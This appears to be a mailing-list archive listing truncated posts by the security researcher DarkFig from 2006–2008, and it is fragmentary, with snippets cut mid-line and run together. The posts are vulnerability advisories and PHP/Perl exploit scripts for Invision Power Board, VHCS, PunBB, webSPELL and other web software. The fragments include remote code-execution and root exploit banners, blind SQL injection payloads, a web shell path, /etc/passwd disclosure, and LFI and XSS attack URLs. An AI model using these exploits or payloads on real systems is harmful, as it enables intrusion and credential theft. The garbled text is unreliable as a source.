{
if( $exit )
usage();
return true;
}
}
}
if( $exit )
usage();
Update: Versions 2.2.x are also affected to the SQL Injection issue. A patch is
available from http://forums.invisionpower.com/index.php?showtopic=276512. They
just corrected the SQL Injection vulnerability. All versions are still affected
to the other issues.
Several changes were made.
* IDS Evasion feature added (%0D)
* You need the phpsploit class version >= 2.1
The newest version is available from :
http://acid-root.new.fr/?1:35
D
ASCII(SUBSTR('.$this->t_field.
','.$this->sub_chr.',1))='.$asc.'
'.$this->t_add_0;
}
else
{
Title: Invision Power Board <= 2.3.5
Multiple Vulnerabilities and Security Bypass
Vendor: http://www.invisionpower.com/community/board/
Advisory: http://acid-root.new.fr/?0:18
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Re
#!/usr/bin/php -q
http://localhost/vhcs2/
#
# VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
# --
#
# About:
# by DarkFig < gmdarkfig (at) gmail (dot) com >
# http://acid-root.new.fr/
# [EMAIL PROTECTED]
#
##
## VULNERABILITY:
##
## Belkin Wireless G Plus MIMO Router F5D9230-4
## Authentication Bypass Vulnerability
##
##
## AUTHOR:
##
## DarkFig < gmdarkfig (at) gmail (dot) com >
## http://acid-root.new.fr/?0:17
## [EMAIL PROTECTED]
##
##
## INTRODUCTION:
##
## I re
Title: PHP Security Framework (Beta 1)
Multiple Vulnerabilities and Security Bypass
Vendor: http://benjilenoob.66ghz.com/projects/
Advisory: http://acid-root.new.fr/?0:16
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on:
#!/usr/bin/php
agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url.'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc
Title: Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
Vendor: http://sourceforge.net/projects/sphpblog/
Advisory: http://acid-root.new.fr/?0:15
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2007/10/21
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5125
Same as mine:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1171
[me]
# +nsbypass.php
# 16. $tid = intval($tid);
# 17. if(isset($_COOKIE['admin']) && !empty($_COOKIE['admin'])) {
# 18. $abadmin = base64_decode($_COOKIE['admin']);
# 19. $abadmin = ex
sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.
You're all right. I added your replies in the advisory (if you want that I
retire them, feel free to contact me).
Title:PHP parse_str() arbitrary variable overwrite
Vendor:http://www.php.net/
Advisory:http://www.acid-root.new.fr/advisories/14070612.txt
Author:DarkFig < gmdarkfig (at) gmail (dot) com >
Written on:2007/06/12
Released on:2007/06/12
Risk
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
require("phpsploitclass.php"); # If you want to use this class, the latest
# version can
#!/usr/bin/php
URL: http://www.acid-root.new.fr/
---
Usage: $argv[0] -url <> -usr <> -pwd <> [Options]
Params: -url For example http://victim.com/punBB/
-usr User account (1 post at least)
Title:PunBB <= 1.2.14 Multiple Vulnerabilities
Author:DarkFig < gmdarkfig (at) gmail (dot) com >
Written on:2007/04/08
Released on:2007/04/11
Risk level:High
URL:http://www.acid-root.new.fr/advisories/13070411.txt
Summary:SQL
#!/usr/bin/php
http://www.milw0rm.com/exploits/2012
# They corrected (not all) a lot of SQL requests which use the ipaddress, with
$db->escape_string.
# They don't corrected the function (this is a choice ... the bad) and they
forgot to correct 1 (only) SQL request.
# They must correct the proble
#!/usr/bin/php
http://www.acid-root.new.fr \/ [EMAIL PROTECTED]
NOTE | Works regardless of php settings
USAGE | $argv[0] -url [Options]
OPTIONS | -proxy If you wanna use a proxy
| -proxyauth Basic authentification
");exit(1);
}
$url = getparam('url',1);
$pro = getparam('proxy'
#!/usr/bin/php
= 4.0.24) Exploit ---
---
PHP conditions: none
CMS conditions: disable_switch<=0 (module activated), track_active=1
Credits: DarkFig <[EMAIL PROTECTED]>
URL: http://www.acid-root.new.fr/
--
#!/usr/bin/php
http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
-- webSPELL <= 4.01.02 Remote PHP Code Execution Exploit --
---
PHP conditions: register_globals=On
Credits: Dark
#!/usr/bin/php
URL: http://www.acid-root.new.fr/
---
Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]
Params: -url For example http://victim.com/connectix/
-usr The username of your accoun
#!/usr/bin/php
URL: http://www.acid-root.new.fr/
Support us: Just click once on our publicity ;)
--
Usage: $argv[0] -url -victim [Opts]
Options: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?
#!/usr/bin/php
File Disclosure
# Maybe work on other versions.
# Interesting exploit =)
#
if($argc < 5) {
print("
NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit
--
PHP conditions: none
CMS conditions: disable_switch<
Little error for the file upload vulnerability.
Updated, see http://www.acid-root.new.fr/advisories/12070214.txt.
Sorry for the inconvenience :(.
"An attacker can access to this script, simply by sending a request
which not contains the "is_guest" and "is_user" variables."
Title:Jupiter CMS 1.1.5 Multiple Vulnerabilities
Advisory ID:12070214
Risk level:High
Author:DarkFig <[EMAIL PROTECTED]>
URL:http://www.acid-root.new.fr/advisories/12070214.txt
.: [ OVERVIEW ]
Jupiter CMS 1.1.5 is a powerful user-friendly Community
This is not an SQL Injection. The script don't use any SQL database, please
tell me where is the sql request =). However the install.php script can lead to
php code execution (works regardless of php.ini settings). Proof of concept:
-
#!/usr/bin/php
$cod = "print(poc)";
$xpl = new phpsploit
#!/usr/bin/php
= 1.2
error_reporting(E_ALL ^ E_NOTICE);
/*
header> Aztek Forum 4.1 Multiple Vulnerabilities Exploit
header> ===
sploit> Owner -> root
status> Trying to register a new user
sploit> Login/Password -> phpsploit8435
status> Trying t
Little error: Last version is 4.00.
Updated, sorry for the inconvenience.
#!/usr/bin/php
@lex Guestbook <= 4.0.2 Remote Command Execution Exploit
| header>
| status> Retrieving the administrator password
| sploit> AdminUsername::root
| sploit> AdminPassword::toor
| status> Trying to get logged in
| sploit> D
#!/usr/bin/php
";
print "\nProxyOptions..: ";
print "\nExample...: php xpl.php http://c.com/ admin passwd";
print "\n-\n";
exit(1);
}
/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2]
#!/usr/bin/php
Options...:
Example...: php xpl.txt http://hihi.org/ /etc/passwd
\n");
exit(1);
}
$url =$argv[1];$file =$argv[2];
$proxh=$argv[3];$proxa=$argv[4];
$xpl = new phpsploit();
$xpl->agent("Mozilla");
if($proxh) $xp
'Administrateur') { header("Location:
../index.php");}
;} else { header("Location: ../index.php");}?>
...
*/
if(!isset($_GET['host']) || empty($_GET['host'])) headers();
if(!isset($_GET['wanted'])) $wanted = 'index.php';
$host = $_GET['host'];
$prox = $_GET['prox'];
$path = $_GET['path'];
e
#!/usr/bin/perl
#
# INFORMATIONS
#
# Affected.scr..: Ixprim 1.2
# Poc.ID: 16061221
# Type..: Blind SQL Injection
# Risk.level: Medium
# Conditions: load_file privilege (ixp code only)
# Src.download..: www.ixprim-cms.org
# Poc.link..: acid-root.new.fr/poc/16
#!/usr/bin/perl
#
#
# INFORMATIONS
#
# Affected.scr..: Cahier de texte V2.0
# Poc.ID: 15061124
# Type..: Predictable backup filename, Source disclosure
# Risk.level: High
# Conditions: register_globals = on
# Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_d
Already posted here http://s-a-p.ca/index.php?page=OurAdvisories&id=27
Already posted here (2006-11-14 17:10:35)
http://s-a-p.ca/index.php?page=OurAdvisories&id=31.
Stop copying them!!
#!/usr/bin/php
---\n");
exit(1);
}
print "\n Please be patient (max=736 hits)...\n MD5: ";
$host = !preg_match("/^http:\/\/(\S*)/",$argv[1],$hwttp) ? $argv[1] : $hwttp[1];
$path = $argv[2];
$usid = intval($argv[3]);
$tabl = "o2_members";
fo
#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in
#!/usr/bin/perl
#
# Affected.scr..: Blog Pixel Motion V2.1.1
# Poc.ID: 12060927
# Type..: PHP Code Execution (stripslashes), SQL Injection (urldecode)
# Risk.level: High
# Vendor.Status.: Unpatched
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip
# Poc.link..: a
Sorry for the little error, *Unpatched.
Just imagine, you have a limited access (sql command are filtered for example)
to an sql injection, you don't know the source code of the php script. You
can't do anything with the sql injection, all your attempts conduct to an error
returned to client.
esponse from PHP Team.
==[ TIMELINE
06. Sept. 2006 - Vendor contacted
20. Sept. 2006 - Public disclosure
==[ CONTACT
===
Author: DarkFig
Web...: www.acid-root.new.fr
E-mail: gmdarkfig[*]gmail[*]com (fr/en)
Note: Tested on 4.4.3
#!/usr/bin/perl
#
# Affected.scr..: SoftBB 0.1
# Poc.ID: 11060904
# Type..: PHP code execution, SQL Injection, Full Path Disclosure
# Risk.level: High
# Vendor.Status.: Unpatched
# Src.download..: softbb.be
# Poc.link..: acid-root.new.fr/poc/11060904.txt
# Advisory.
#!/usr/bin/perl
#
# Affected.scr..: Tr Forum V2.0
# Poc.ID: 10060903
# Type..: SQL Injection, Bypass Security Restriction
# Risk.level: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.tr-forum.1579.html
# Poc.link..: acid-root.new.fr/p
#!/usr/bin/perl
#
# Affected.scr..: Annuaire 1Two 2.2
# Poc.ID: 09060902.txt
# Type..: SQL Injection (without quote)
# Risk.level: Medium
# Vendor.Status.: Unpatched
# Src.download..: http://www.1two.org/
# Poc.link..: acid-root.new.fr/poc/09060902.txt
# Credits
#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID: 08060901
# Type..: Member's passwords are stored in .dat file no protected by a
.htaccess file
# Risk.level: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.
verified.
==[ TIMELINE
29. Aug. 2006 - Public Disclosure
==[ CONTACT
===
Author: DarkFig
Web...: www.acid-root.new.fr
E-mail: gmdarkfig[*]gmail[*]com (fr/en)
#
# VulnScr: ezContents Version 2.0.3
# Web: http://www.ezcontents.org/
#
# Date...: Web July 28 10:44 2006
# Credits: DarkFig ([EMAIL PROTECTED])
# Vuln...: SQL Injection, Remote/Local File Inclusion, Cross Site Scripting
#
==[ Remote / Local File Inclusion
==
#!/usr/bin/perl
#
# VulnScr: boastMachine version 3.1 and prior
# Web: http://boastology.com/
#
# Date: Sun July 16 10:43 PM 2006
# Credits: DarkFig ([EMAIL PROTECTED])
# Vuln: SQL Injection, Cross Site Scripting, Cross Site Request Forgery,
Predictable Backup Filename
#
# Title: 5 php scripts remote database password disclosure
# Date: Sun July 02 21:04 2006
# Credits: Security hole discovered by DarkFig ([EMAIL PROTECTED])
# Problem: Database configuration is located in a .inc file(no protected by
.htaccess file)
# Web: http://acid-root
#!/usr/bin/perl
#
# VulnScr: SturGeoN Upload v1
#Author: Jihad BENABRA
# Download: http://rapidshare.de/files/24622338/2012_sturgeon-1.rar.html
# WTF?: http://www.comscripts.com/scripts/php.sturgeon-upload.2012.html
#
# Date: Sat July 1 10:04 2006
# Credits: Vuln and Xpl
#!/usr/bin/perl
#
# VulnScr: News version 5.2 and prior
#E-mail: [EMAIL PROTECTED]
# Web: www.vincent-leclercq.com
#
# Date: Thu June 29 12:01 2006
# Credits: DarkFig ([EMAIL PROTECTED])
# Vuln: XSS, Full Path Disclosure, SQL Injection
# Advisorie: http://www.acid-r
#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full
Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
use IO::Socket;
use LWP::Simple;
# Header
print "\r\n+---
PhpMyFactures 1.0
*
Full Path Disclosure
[Guest] http://[...]/verif.php
[Guest] http://[...]/inc/footer.php
[Guest] http://[...]/remises/ajouter_remise.php
Informations modification
*
[Guest] http://[...]/tva/ajouter_tva.
Cross Site Scripting
http://[...]/read.php?msg_result=[XSS]
http://[...]/read.php?rep_titre=";>[XSS]
Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS]
SQL Injection
*
http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
http://[..
// Script
Web www.npds.org
versions --- NPDS <= 5.10
Solutions -- None official
Note --- Vendor has been contacted
// Local Inclusion
http://[...]/header.php?Default_Theme=../apache/logs/error.log%00
http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../../apa
#!/usr/bin/perl
#
# by DarkFig -- www.acid-root.new.fr
#
use LWP::Simple;
if ( !$ARGV[1] ) {
header();
print "\n| Usage: |";
print "\n+--+";
print "\n| Example: http://localhost/dmx/ 1 --|";
end();
}
sub header {
print "
Type: SQL Injection
Risk: Critical
Product: CoolForum <= 0.8.3 beta
Vulnerability
*
// File: editpost.php
// Line 38
//
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);
else $post = 0;
--
// Line 77
//
$canedit = getrighted
58 matches
Mail list logo
